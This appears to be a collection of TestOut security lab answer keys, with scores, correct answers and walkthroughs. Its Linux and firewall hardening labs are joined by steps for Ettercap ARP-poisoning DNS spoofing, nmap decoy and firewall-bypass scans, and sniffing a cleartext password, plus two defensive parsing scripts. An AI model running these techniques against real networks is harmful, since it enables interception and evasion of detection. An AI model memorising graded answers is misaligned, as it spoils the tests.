192.168.0.30    Exec
192.168.0.31    ITAdmin
192.168.0.32    Gst-Lap
192.168.0.33    Office1
192.168.0.34    Office2
192.168.0.45    Support
192.168.0.46    IT-Laptop
Your Performance
Your Score: 2 of 2 (100%)
Pass Status:
Pass
Elapsed Time: 4 minutes 16 seconds
Required Score: 100%
Task Summary
Required Actions
Disable and stop services on port 3389 on Office1
  Use Zenmap to identify the target machines
  Remote Desktop Service disabled
  Remote Desktop Service stopped
Disable and stop services on port 5938 on Exec
  Use Zenmap to identify the target machines
  TeamViewer disabled
  TeamViewer stopped
Explanation
Complete this lab as follows:
1. From the Favorites bar, open Zenmap.
2. In the Command field, type nmap -p 3389 192.168.0.0/24.
3. Select Scan to scan the subnet for a given service.
4. Using the table in the scenario, identify the computer with the open port using the IP address.
5. From the top navigation tabs, select Floor 1 Overview.
6. Select the identified computer to enter its OS view.
7. In the search field on the taskbar, type Services.
8. Under Best match, select Services.
9. Maximize the window for easier viewing.
10. Double-click the service that needs to be stopped to open the Properties dialogue.
11. From the Startup type drop-down list, select Disabled.
12. Under Service status, select Stop.
13. Select OK.
14. From the top navigation tabs, select Floor 1 Overview.
15. Under IT Administration, select IT-Laptop.
16. In Zenmap's Command Field, enter nmap -p 5938 192.168.0.0/24.
17. Repeat steps 3–13.
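The matching step above (open port, then IP address, then computer name) can be automated for a recurring audit. The following is an added example, not part of the TestOut lab: it assumes both ports were scanned in one run saved in nmap's grepable format (`-oG`), and the scan output embedded in it, including the host 192.168.0.99, is constructed for illustration.

```python
"""Map nmap grepable (-oG) results for watched ports to the scenario's inventory."""
import ipaddress
import re

# IP-to-name table from the scenario.
INVENTORY = {
    "192.168.0.30": "Exec",
    "192.168.0.31": "ITAdmin",
    "192.168.0.32": "Gst-Lap",
    "192.168.0.33": "Office1",
    "192.168.0.34": "Office2",
    "192.168.0.45": "Support",
    "192.168.0.46": "IT-Laptop",
}

# Ports the lab scans for, with the service that has to be disabled and stopped.
WATCHED = {3389: "Remote Desktop Services", 5938: "TeamViewer"}

# Constructed sample in grepable format; not output captured from the lab.
# 192.168.0.99 is a made-up host that is absent from the inventory table.
SAMPLE_GNMAP = (
    "# Nmap scan (constructed sample)\n"
    "Host: 192.168.0.30 ()\tStatus: Up\n"
    "Host: 192.168.0.30 ()\tPorts: 3389/closed/tcp//ms-wbt-server///, "
    "5938/open/tcp//teamviewer///\n"
    "Host: 192.168.0.33 ()\tPorts: 3389/open/tcp//ms-wbt-server///, "
    "5938/closed/tcp//teamviewer///\n"
    "Host: 192.168.0.45 ()\tPorts: 3389/filtered/tcp//ms-wbt-server///"
    "\tIgnored State: closed (1)\n"
    "Host: 192.168.0.99 ()\tPorts: 3389/open/tcp//ms-wbt-server///, "
    "5938/closed/tcp//teamviewer///\n"
)

# A "Ports:" record ends at the next tab (for example before "Ignored State:").
PORTS_LINE = re.compile(r"^Host:\s+(\S+)\s+\([^)]*\)\s+Ports:\s+([^\t]*)")


def open_watched_ports(gnmap_text):
    """Return (ip, port) pairs whose state is exactly 'open' on a watched TCP port."""
    hits = []
    for line in gnmap_text.splitlines():
        match = PORTS_LINE.match(line)
        if not match:
            continue  # comment line, Status line, or anything else
        ip, port_list = match.group(1), match.group(2)
        for entry in port_list.split(","):
            fields = entry.strip().split("/")
            if len(fields) < 3 or not fields[0].isdigit():
                continue
            port, state, proto = int(fields[0]), fields[1], fields[2]
            # 'closed' and 'filtered' are not evidence of a running service.
            if proto == "tcp" and state == "open" and port in WATCHED:
                hits.append((ip, port))
    return hits


def audit(gnmap_text, inventory=INVENTORY):
    """Resolve each hit to a computer name; unknown IPs are reported, not dropped."""
    rows = []
    for ip, port in open_watched_ports(gnmap_text):
        rows.append({
            "ip": ip,
            "computer": inventory.get(ip, "UNKNOWN (not in inventory)"),
            "port": port,
            "service": WATCHED[port],
        })
    rows.sort(key=lambda r: (r["port"], ipaddress.ip_address(r["ip"])))
    return rows


if __name__ == "__main__":
    for row in audit(SAMPLE_GNMAP):
        print(f'{row["port"]:>5}  {row["ip"]:<14} {row["computer"]:<28} '
              f'disable and stop: {row["service"]}')
```

An address that answers on a watched port but is missing from the inventory is worth a separate follow-up, because it is a device nobody has accounted for.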
QUESTION 13:
While working on your Linux server, you want to practice starting, stopping, and restarting a service using the systemctl command.
“You are logged in as root so the sudo command is not necessary.”
In this lab, your task is to:
• Use the systemctl command to start bluetooth.service.
• Use the systemctl command to stop bluetooth.service.
• Use the systemctl command to restart bluetooth.service.
“After each command, you can check the service status with the systemctl command.”
Your Performance
Your Score: 3 of 3 (100%)
Pass Status:
Pass
Elapsed Time: 3 minutes 19 seconds
Required Score: 100%
Task Summary
Required Actions
Start service
Stop service
Restart service
Explanation
Complete this lab as follows:
1. At the prompt, type systemctl start bluetooth.service and press Enter to start bluetooth.service.
2. Type systemctl stop bluetooth.service and press Enter to stop bluetooth.service.
3. Type systemctl restart bluetooth.service and press Enter to restart bluetooth.service.
QUESTION 14:
While working on your Linux server, you want to enable anaconda.service and disable vmtoolsd.service using the systemctl command.
“You are logged in as root so the sudo command is not necessary.”
In this lab, your task is to:
• Use the systemctl command to enable anaconda.service.
• Use the systemctl command to disable vmtoolsd.service.
• After each command, check the service status with the systemctl is-enabled command.
Your Performance
Your Score: 2 of 2 (100%)
Pass Status:
Pass
Elapsed Time: 1 minute 26 seconds
Required Score: 100%
Task Summary
Required Actions
Enable service
Disable service
Explanation
Complete this lab as follows:
1. At the prompt, type systemctl enable anaconda.service and press Enter to enable anaconda.service.
2. Type systemctl is-enabled anaconda.service and press Enter to check the service status.
3. Type systemctl disable vmtoolsd.service and press Enter to disable vmtoolsd.service.
4. Type systemctl is-enabled vmtoolsd.service and press Enter to check the service status.
QUESTION 15:
Based on your review of physical security, you have recommended
several improvements. Your plan includes smart card readers, IP
cameras, signs, and access logs.
Smart cards have the ability to encrypt access information. Smart
cards can require contact or be contactless. Proximity cards, also
known as RFID (radio frequency identification) cards, are a subset of
smart cards that use the 125 kHz frequency to communicate with
proximity readers. Proximity cards differ from smart cards because
they are designed to only communicate the card's ID, but the smart
card can communicate more information.
Use IP security cameras because they operate over the TCP/IP
network.
Implement your physical security plan by dragging the correct items
from the shelf into the various locations in the building. As you drag
the items from the shelf, the possible drop locations are highlighted.
Not all items on the shelf will be used.
In this lab, your task is to:
• Install the smart card key readers in the appropriate location to control access to key infrastructure. The key card readers should be contactless and record more than the card's ID.
• Install the IP security cameras in the appropriate location to record which employees access the key infrastructure. The security cameras should operate over the TCP/IP network.
• Install a Restricted Access sign on the networking closet door to control access to the infrastructure.
• Install the visitor log on the Lobby desk.
Your Performance
Your Score: 4 of 4 (100%)
Pass Status:
Pass
Elapsed Time: 31 seconds
Required Score: 100%
Task Summary
Required Actions
Install the smart card key readers
  Install the card reader outside the building's front door
  Install the card reader outside the Networking Closet door
Install the IP security cameras
  Install the IP security camera inside the Networking Closet
  Install the IP security camera outside the Networking Closet
Install the Restricted Access sign on the Networking Closet door
Install the visitor log on the Lobby desk
Explanation
In this lab, your task is to:
• Install the smart card key readers
• Install the IP security cameras
• Install the Restricted Access sign on the networking closet door
• Install the visitor log on the Lobby desk
Complete this lab as follows:
1. Install the smart card key readers as follows:
   a. On the Shelf, expand Door Locks.
   b. Drag a Smart Card Reader from the shelf to the highlighted location outside the building's front door.
   c. Drag a Smart Card Reader from the shelf to the highlighted location outside the Networking Closet's door.
2. Install the IP security cameras as follows:
   a. On the Shelf, expand CCTV Cameras.
   b. Drag the IP Security Camera from the shelf to the highlighted circle inside the Networking Closet.
   c. Drag the IP Security Camera from the shelf to just outside the Networking Closet.
3. Install the Restricted Access sign as follows:
   a. On the Shelf, expand Restricted Access Signs.
   b. Drag the Restricted Access Sign from the shelf to the Networking Closet door.
4. Install the visitor log as follows:
   a. On the Shelf, expand Visitor Logs.
   b. Drag the Visitor Log from the shelf to the Lobby desk.
QUESTION 16:
You work as the IT security administrator for a small corporate
network. You recently placed a web server in the DMZ. You need to
configure the perimeter firewall on the network security appliance to
allow access to the web server from the LAN and the WAN. You
would also like to improve security by utilizing the attack security
features provided by the firewall.
In this lab, your task is to:
• Add an HTTP firewall rule that allows traffic from the WAN to the web server in the DMZ.
  Parameter            Setting
  From Zone            UNSECURE (WAN)
  To Zone              DMZ
  Service              HTTP
  Action               Allow Always
  Source Hosts         Any
  Internal IP Address  172.16.2.100
  External IP Address  Dedicated WAN
• Add an HTTPS firewall rule that allows traffic from the WAN to the web server in the DMZ.
  Parameter            Setting
  From Zone            UNSECURE (WAN)
  To Zone              DMZ
  Service              HTTPS
  Action               Allow Always
  Source Hosts         Any
  Internal IP Address  172.16.2.100
  External IP Address  Dedicated WAN
• Add a firewall rule to allow traffic from the LAN to the DMZ.
  Parameter            Setting
  From Zone            SECURE (LAN)
  To Zone              DMZ
  Service              Any
  Action               Allow Always
  Source Hosts         Any
  Destination Hosts    Any
• Enable all the firewall attack checks.
Your Performance
Your Score: 6 of 6 (100%)
Pass Status:
Pass
Elapsed Time: 3 minutes 42 seconds
Required Score: 100%
Task Summary
Required Actions
Add an HTTP firewall rule that allows traffic from the WAN to the web server in the DMZ
  From Zone: UNSECURE (WAN)
  To Zone: DMZ
  Service: HTTP
  Action: Allow Always
  Source Hosts: Any
  Internal IP Address: 172.16.2.100
  External IP Address: Dedicated WAN
Add an HTTPS firewall rule that allows traffic from the WAN to the web server in the DMZ
  From Zone: UNSECURE (WAN)
  To Zone: DMZ
  Service: HTTPS
  Action: Allow Always
  Source Hosts: Any
  Internal IP Address: 172.16.2.100
  External IP Address: Dedicated WAN
Add a firewall rule to allow traffic from the LAN to the DMZ
  From Zone: SECURE (LAN)
  To Zone: DMZ
  Service: Any
  Action: Allow Always
Enable WAN security checks
  Block Ping to WAN interface
  Enable Stealth Mode
  Block TCP Flood
Enable LAN security checks
Enable ICSA settings
  Block ICMP Notification
  Block Fragmented Packets
  Block Multicast Packets
Explanation
Complete this lab as follows:
1. Configure the firewall as follows:
   a. From the top menu of the Security Appliance Configuration Utility, select Firewall.
   b. From the left pane, select IPv4 Rules.
   c. In the right pane, select Add.
   d. Modify the firewall rule parameters.
   e. Click Apply.
   f. Repeat steps 1c–1e for each firewall rule.
2. Enable firewall attack checks as follows:
   a. From the left pane, select Attacks.
   b. Select all the WAN security checks.
   c. Select all the LAN security checks.
   d. Select all the ICSA settings.
   e. Click Apply.
A.3 TestOut Random Labs Not Included in the Practice Labs
QUESTION 1:
9.2.7 Scan for Open Ports from a Remote Computer
CorpNet.xyz has hired you as a penetration testing consultant. While
visiting the company, you connected a small computer to the switch in
the Networking Closet. This computer also functions as a rogue
wireless access point. Now you are sitting in your van in the parking
lot of CorpNet.xyz, where you are connected to the internal network
through the rogue wireless access point. Using the small computer
you left behind, you can perform remote exploits against the company.
In this lab, your task is to:
• Use ssh -X to connect to your rogue computer (192.168.0.251).
• Use 1worm4b8 as the root password.
• Use Zenmap on the remote computer to scan all the ports on the internal network looking for computers vulnerable to attack.
• Answer the question.
Your Performance
Your Score: 3 of 3 (100%)
Pass Status:
Pass
Elapsed Time: 3 minutes 37 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Use ssh -X to connect to the remote computer
Use Zenmap to scan 192.168.0.0/24
Q1 Which of the following computers have vulnerable open ports?
Your answer: 192.168.0.10, 192.168.0.11, 192.168.0.14, 192.168.0.45
Correct answer: 192.168.0.10, 192.168.0.11, 192.168.0.14, 192.168.0.45
Explanation
Complete this lab as follows:
1. From the Favorites bar, open Terminal.
2. At the prompt, type ssh -X 192.168.0.251 and press Enter.
3. For the root password, type 1worm4b8 and press Enter.
   You are now connected to Rogue1.
4. Type zenmap and press Enter to launch Zenmap remotely.
   Zenmap is running on the remote computer, but you see the screen locally.
5. In the Command field, type nmap -p- 192.168.0.0/24.
6. Select Scan.
7. From the results, find the computers with ports open that make them vulnerable to attack.
8. In the top right, select Answer Questions.
9. Answer the question.
10. Select Score Lab.
QUESTION 2:
10.1.8 Poison ARP and Analyze with Wireshark
You are the IT security administrator for a small corporate network.
You believe a hacker has penetrated your network and is using ARP
poisoning to infiltrate it.
In this lab, your task is to discover whether ARP poisoning is taking
place as follows:
• Use Wireshark to capture packets on the enp2s0 interface for five seconds.
• Analyze the Wireshark packets to determine whether ARP poisoning is taking place.
• Use the 192.168.0.2 IP address to help make your determination.
• Answer the questions.
Your Performance
Your Score: 2 of 2 (100%)
Pass Status:
Pass
Elapsed Time: 7 minutes 6 seconds
Required Score: 100%
Task Summary
Lab Questions
Q1 What is the MAC address of the first responding device?
Your answer: 00:00:1B:11:22:33
Correct answer: 00:00:1B:11:22:33
Q2 What was the MAC address of the duplicate responding device?
Your answer: 00:00:1B:33:22:11
Correct answer: 00:00:1B:33:22:11
Explanation
In this lab, your task is to discover if ARP poisoning is happening as follows:
• Use Wireshark to capture packets on the enp2s0 interface for five seconds.
• Analyze the Wireshark packets to determine whether ARP poisoning is taking place.
• Use the 192.168.0.2 IP address to help make your determination.
• Answer the questions.
Complete this lab as follows:
1. From the Favorites bar, open Wireshark.
2. Maximize the window for easier viewing.
3. Under Capture, select enp2s0.
4. Select the blue fin to begin a Wireshark capture.
5. After capturing packets for 5 seconds, select the red box to stop the Wireshark capture.
6. In the Apply a display filter field, type arp and press Enter to only show ARP packets.
7. In the Info column, look for the lines containing the 192.168.0.2 IP address.
8. In the top right, select Answer Questions.
9. Answer the questions.
10. Select Score Lab.
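The manual check in steps 6 and 7 (two different MAC addresses answering for 192.168.0.2) can be expressed as detection logic over exported ARP rows. This is an added example, not part of the TestOut lab: the row layout (time, Ethernet source, Ethernet destination, Info text) is an assumed export format, and every address and timing other than the two MAC addresses from the lab's answers is constructed.

```python
"""Flag IP addresses claimed by more than one MAC in a list of ARP packets."""
import re

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
WHO_HAS = re.compile(rf"Who has ({IPV4})\?")
IS_AT = re.compile(rf"({IPV4}) is at ((?:[0-9A-Fa-f]{{2}}:){{5}}[0-9A-Fa-f]{{2}})")

# Constructed rows: time, Ethernet source, Ethernet destination, Info column text.
# Only the two MACs answering for 192.168.0.2 come from the lab's answers.
SAMPLE_ROWS = """\
0.000100,00:00:1b:aa:bb:01,ff:ff:ff:ff:ff:ff,Who has 192.168.0.2? Tell 192.168.0.31
0.000350,00:00:1b:11:22:33,00:00:1b:aa:bb:01,192.168.0.2 is at 00:00:1b:11:22:33
0.900000,00:00:1b:33:22:11,00:00:1b:aa:bb:01,192.168.0.2 is at 00:00:1b:33:22:11
1.900000,00:00:1b:33:22:11,00:00:1b:aa:bb:01,192.168.0.2 is at 00:00:1b:33:22:11
2.100000,00:00:1b:aa:bb:01,ff:ff:ff:ff:ff:ff,Who has 192.168.0.1? Tell 192.168.0.31
2.100400,00:00:1b:aa:bb:fe,00:00:1b:aa:bb:01,192.168.0.1 is at 00:00:1b:aa:bb:fe
"""


def analyze_arp(rows_text):
    """Return (conflicts, unsolicited).

    conflicts:   ip -> list of MACs that claimed it, in first-seen order,
                 only for IPs claimed by more than one MAC.
    unsolicited: (ip, mac) -> number of replies seen with no outstanding
                 request for that IP, a common side effect of ARP poisoning.
    """
    claims = {}        # ip -> MACs in first-seen order
    pending = set()    # IPs that were asked for and not yet answered
    unsolicited = {}
    for line in rows_text.strip().splitlines():
        parts = line.split(",", 3)
        if len(parts) < 4:
            continue  # malformed row
        info = parts[3]
        request = WHO_HAS.search(info)
        if request:
            pending.add(request.group(1))
            continue
        reply = IS_AT.search(info)
        if not reply:
            continue
        ip, mac = reply.group(1), reply.group(2).upper()
        seen = claims.setdefault(ip, [])
        if mac not in seen:
            seen.append(mac)
        if ip in pending:
            pending.discard(ip)  # first answer satisfies the request
        else:
            unsolicited[(ip, mac)] = unsolicited.get((ip, mac), 0) + 1
    conflicts = {ip: macs for ip, macs in claims.items() if len(macs) > 1}
    return conflicts, unsolicited


def responders(rows_text, ip):
    """Return (first_responder, [duplicate_responders]) for one IP address."""
    conflicts, _ = analyze_arp(rows_text)
    macs = conflicts.get(ip)
    if not macs:
        return None, []
    return macs[0], macs[1:]


if __name__ == "__main__":
    found, extra = analyze_arp(SAMPLE_ROWS)
    for address, macs in found.items():
        print(f"{address} claimed by {', '.join(macs)}")
    for (address, mac), count in extra.items():
        print(f"{count} unsolicited replies for {address} from {mac}")
```

The first-seen MAC is not automatically the legitimate one; compare both against a known-good record such as a switch CAM table or DHCP lease before acting.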
QUESTION 3:
0.1.10 Poison DNS
You are the IT security administrator for a small corporate network.
You want to spoof the DNS to redirect traffic as part of a man-in-the-
middle attack.
In this lab, your task is to:
• Use Ettercap to begin sniffing and scanning for hosts.
• Set Exec (192.168.0.30) as the target machine.
• Initiate DNS spoofing.
• From Exec, access rmksupplies.com.
Your Performance
Your Score: 3 of 3 (100%)
Pass Status:
Pass
Elapsed Time: 1 minute 13 seconds
Required Score: 100%
Task Summary
Required Actions
Scan for hosts in Ettercap
Set Exec as the target machine and initiate DNS spoofing
Confirm the redirection to Exec
Explanation
Complete this lab as follows:
1. Use Ettercap to begin sniffing and scanning for hosts as follows:
   a. From the Favorites bar, open Ettercap.
   b. Select Sniff.
   c. Select Unified sniffing.
   d. From the Network Interface drop-down list, select enp2s0.
   e. Select OK.
   f. Select Hosts and select Scan for hosts.
2. Set Exec (192.168.0.30) as the target machine as follows:
   a. Select Hosts and select Host list.
   b. Under IP Address, select 192.168.0.30.
   c. Select Add to Target 1 to assign it as the target.
3. Initiate DNS spoofing as follows:
   a. Select Plugins.
   b. Select Manage the plugins.
   c. Select the Plugins tab.
   d. Double-click dns_spoof to activate it.
   e. Select Mitm.
   f. Select ARP poisoning.
   g. Select Sniff remote connections.
   h. Select OK.
4. From Exec, access rmksupplies.com as follows:
   a. From the top navigation tabs, select Floor 1 Overview.
   b. Under Executive Office, select Exec.
   c. From the task bar, open Chrome.
   d. In the URL field, type rmksupplies.com and press Enter.
      Notice that the page was redirected to RUS Office Supplies despite the web address not changing.
QUESTION 4:
10.1.11 Filter and Analyze Traffic with Wireshark
You are the IT administrator for a small corporate network. You need
to find specific information about the packets being exchanged on
your network using Wireshark.
In this lab, your task is to:
• Use Wireshark to capture packets from the enp2s0 interface.
• Use the following Wireshark filters to isolate and examine specific types of packets:
  o net 192.168.0.0
  o host 192.168.0.34
  o tcp contains password
• Answer the questions.
Your Performance
Your Score: 6 of 6 (100%)
Pass Status:
Pass
Elapsed Time: 1 minute 53 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Isolate traffic with the net 192.168.0.0 filter.
Q1 What is the effect of the net 192.168.0.0 filter in Wireshark?
Your answer: Packets with either a source or destination address on the 192.168.0.0 network are displayed.
Correct answer: Packets with either a source or destination address on the 192.168.0.0 network are displayed.
Isolate traffic with the host 192.168.0.34 filter.
Q2 What is the effect of the host 192.168.0.34 filter in Wireshark?
Your answer: Packets with 192.168.0.34 in either the source or destination address are displayed.
Correct answer: Packets with 192.168.0.34 in either the source or destination address are displayed.
Isolate traffic with the tcp contains password filter.
Q3 What is the captured password?
Your answer: St@yOut!@
Correct answer: St@y0ut!@
Explanation
Complete this lab as follows:
1. Begin a Wireshark capture as follows:
   a. From the Favorites bar, open Wireshark.
   b. Under Capture, select enp2s0.
   c. Select the blue fin to begin a Wireshark capture.
2. Apply the net 192.168.0.0 filter as follows:
   a. In the Apply a display filter field, type net 192.168.0.0 and press Enter.
      Look at the source and destination addresses of the filtered packets.
   b. In the top right, select Answer Questions.
   c. Under Lab Questions, answer question 1.
3. Apply the host 192.168.0.34 filter as follows:
   a. In the Apply a display filter field, type host 192.168.0.34 and press Enter.
      Look at the source and destination addresses of the filtered packets.
   b. Under Lab Questions, answer question 2.
4. Apply the tcp contains password filter as follows:
   a. In the Apply a display filter field, type tcp contains password and press Enter.
   b. Select the red box to stop the Wireshark capture.
   c. Locate the password in the captured packet.
   d. Under Lab Questions, answer question 3.
   e. Select Score Lab.
QUESTION 5:
11.2.10 Perform a Decoy Scan with Zenmap
You work for a penetration testing consulting company. You need to
make sure that you can't be identified by the intrusion detection
systems.
In this lab, your task is to perform a decoy scan on CorpNet.local as
follows:
• Tools: Wireshark and Zenmap
• Interface: enp2s0
• Random IP addresses: 25
• IP address: 192.168.0.31
Your Performance
Your Score: 1 of 1 (100%)
Pass Status:
Pass
Elapsed Time: 1 minute 4 seconds
Required Score: 100%
Task Summary
Required Actions
Perform a decoy scan
Explanation
Complete this lab as follows:
1. From the Favorites bar, open Wireshark.
2. Under Capture, select enp2s0.
3. In the upper left menu, select the blue shark fin to start a scan.
4. From the Favorites bar, open Zenmap.
5. In the Command field, type nmap -D RND:25.
6. In the Target field, type 192.168.0.31.
7. Select Scan.
8. Maximize the Wireshark window.
9. In Wireshark, scroll down until you see 192.168.0.31 in the Destination column.
10. Under Source, view the different IP addresses used to disguise the scan.
QUESTION 6:
11.2.12 Bypass Windows Firewall
You are a cybersecurity specialist. The owner of the CorpNet network
has hired you to perform a penetration test. They are concerned with
the safety of their firewalls. During the reconnaissance phase of your
testing, you discovered a firewall with an IP address of 198.28.2.254.
From outside of the CorpNet network, you decided to scan this firewall
for potential weakness by running an nmap scan.
In this lab, your task is to run the firewall-bypass nmap script against
the firewall.
Your Performance
Your Score: 2 of 2 (100%)
Pass Status:
Pass
Elapsed Time: 45 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
nmap firewall script ran
Q1 Which vulnerabilities were found on the firewall?
Your answer: FTP
Correct answer: FTP
Explanation
In this lab, your task is to run the firewall-bypass nmap script against the firewall.
Complete this lab as follows:
1. From the Favorites bar, open Terminal.
2. Type nmap --script=firewall-bypass 198.28.2.254 and press Enter.
3. In the top right, select Answer Questions.
4. Answer the question.
5. Select Score Lab.